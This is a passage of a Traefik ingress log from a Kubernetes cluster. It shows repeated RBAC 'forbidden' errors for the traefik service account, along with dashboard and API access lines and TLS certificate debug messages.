k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:12:37.924778 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:12:37.924814 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:12:37.952173 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:12:37.952206 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:12:43.388863 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:12:43.388928 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:12:43.496432 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:12:43.496473 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:13:11.316398 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:13:11.316427 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:13:25.154290 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:13:25.154324 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:13:25.371169 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:13:25.371211 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:13:26.063059 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:13:26.063088 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:13:56.352715 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:13:56.352772 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:13:57.300113 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:13:57.300147 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:14:04.035059 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:14:04.035128 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:14:06.466658 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:14:06.466692 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:14:40.871879 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:14:40.872000 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:14:44.010343 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:14:44.010384 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:14:53.927267 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:14:53.927443 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +time="2024-03-30T07:15:00Z" level=debug msg="Serving default certificate for request: \"\"" +W0330 07:15:03.316529 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:15:03.316564 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:15:37.576184 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:15:37.576219 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:15:43.312132 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:15:43.312169 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:15:45.035701 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:15:45.035734 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:15:50.972169 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:15:50.972212 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:15:59 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 3 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:15:59 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 4 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:16:04 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 5 "-" "-" 0ms +W0330 07:16:16.012814 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:16:16.012899 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:16:42.119941 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:16:42.119987 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:16:44.153389 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:16:44.153445 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:16:46.355120 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:16:46.355179 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:17:08.836513 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:17:08.836551 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:17:24.861307 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:17:24.861336 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:17:26.166545 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:17:26.166615 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:17:28.574177 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:17:28.574215 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:17:43.374879 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:17:43.374911 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:18:03.334863 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:18:03.334897 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:18:04.486997 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:18:04.487029 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:18:12.227775 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:18:12.227809 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +time="2024-03-30T07:18:16Z" level=debug msg="Serving default certificate for request: \"172-233-169-13.ip.linodeusercontent.com\"" +time="2024-03-30T07:18:16Z" level=debug msg="http: TLS handshake error from 10.0.0.4:50688: remote error: tls: unknown certificate" +10.2.0.129 - - [30/Mar/2024:07:18:16 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 6 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:16 +0000] "GET /dashboard/ HTTP/1.1" 200 1163 "-" "-" 7 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:18:17 +0000] "GET /dashboard/css/app.d96a5235.css HTTP/1.1" 200 4333 "-" "-" 8 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:17 +0000] "GET /dashboard/css/vendor.609cd54c.css HTTP/1.1" 200 224744 "-" "-" 9 "dashboard@internal" "-" 2ms +10.0.0.4 - - [30/Mar/2024:07:18:17 +0000] "GET /dashboard/js/app.abf00464.js HTTP/1.1" 200 41280 "-" "-" 11 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:17 +0000] "GET /dashboard/js/vendor.5cc359a9.js HTTP/1.1" 200 1223091 "-" "-" 10 "dashboard@internal" "-" 370ms +10.0.0.4 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/css/chunk-common.52fcdaa7.css HTTP/1.1" 200 4938 "-" "-" 12 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/js/8.7e674596.js HTTP/1.1" 200 18550 "-" "-" 14 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/js/chunk-common.5363bb20.js HTTP/1.1" 200 52039 "-" "-" 13 "dashboard@internal" "-" 1ms +10.2.0.129 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/css/8.cb89174c.css HTTP/1.1" 200 944 "-" "-" 15 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/js/7.862fa6b9.js HTTP/1.1" 200 19038 "-" "-" 16 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/css/7.6fbcfcaa.css HTTP/1.1" 200 1499 "-" "-" 17 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:18:19 +0000] "GET /api/version HTTP/1.1" 200 86 "-" "-" 18 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:19 +0000] "GET /api/entrypoints HTTP/1.1" 200 663 "-" "-" 19 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 20 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/fonts/Eva-Icons.ac165c67.woff2 HTTP/1.1" 200 25952 "-" "-" 21 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/fonts/nunito-v11-latin-600.5a8861ee.woff2 HTTP/1.1" 200 20084 "-" "-" 22 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/fonts/flUhRq6tzZclQEJ-Vdg-IuiaDsNcIhQ8tQ.c5371cfb.woff2 HTTP/1.1" 200 128616 "-" "-" 23 "dashboard@internal" "-" 1ms +10.2.0.129 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/fonts/nunito-v11-latin-700.bf2c237c.woff2 HTTP/1.1" 200 20128 "-" "-" 24 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:19 +0000] "GET /dashboard/fonts/nunito-v11-latin-regular.e1a82f09.woff2 HTTP/1.1" 200 19976 "-" "-" 25 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:18:20 +0000] "GET /dashboard/providers/kubernetesingress.svg HTTP/1.1" 200 4605 "-" "-" 26 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:18:20 +0000] "GET /dashboard/fonts/KFOlCnqEu92Fr1MmYUtfBBc-.f5677eb2.woff HTTP/1.1" 200 20424 "-" "-" 27 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:18:20 +0000] "GET /dashboard/icons/favicon.ico HTTP/1.1" 200 10134 "-" "-" 28 "dashboard@internal" "-" 0ms +W0330 07:18:20.891698 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:18:20.891799 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:18:23 +0000] "GET /dashboard/css/2.fea02e71.css HTTP/1.1" 200 662 "-" "-" 29 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:18:23 +0000] "GET /dashboard/js/11.a675a95e.js HTTP/1.1" 200 1950 "-" "-" 30 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:23 +0000] "GET /dashboard/js/2.f326ab8a.js HTTP/1.1" 200 2645 "-" "-" 31 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:18:23 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 32 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:23 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 33 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:23 +0000] "GET /dashboard/providers/internal.svg HTTP/1.1" 200 3681 "-" "-" 34 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:18:23 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=2 HTTP/1.1" 400 53 "-" "-" 35 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:18:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 36 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 37 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:33 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 38 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:18:33 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 39 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:18:38 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 40 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:38 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 41 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:43 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 42 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:18:43 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 43 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:18:48 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 44 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:48 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 45 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:53 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 46 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:18:53 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 47 "api@internal" "-" 0ms +W0330 07:18:53.294981 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:18:53.295065 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:18:55.005662 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:18:55.005695 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:18:56.633582 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:18:56.633626 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:18:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 48 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:18:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 49 "api@internal" "-" 0ms +W0330 07:19:02.224725 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:19:02.224767 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:19:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 50 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:19:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 51 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:19:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 52 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:19:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 53 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:19:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 54 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:19:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 55 "api@internal" "-" 0ms +time="2024-03-30T07:19:15Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +time="2024-03-30T07:19:15Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +time="2024-03-30T07:19:15Z" level=debug msg="http: TLS handshake error from 10.0.0.4:38873: remote error: tls: unknown certificate" +time="2024-03-30T07:19:15Z" level=debug msg="http: TLS handshake error from 10.2.1.1:37768: remote error: tls: unknown certificate" +10.0.0.4 - - [30/Mar/2024:07:19:19 +0000] "GET 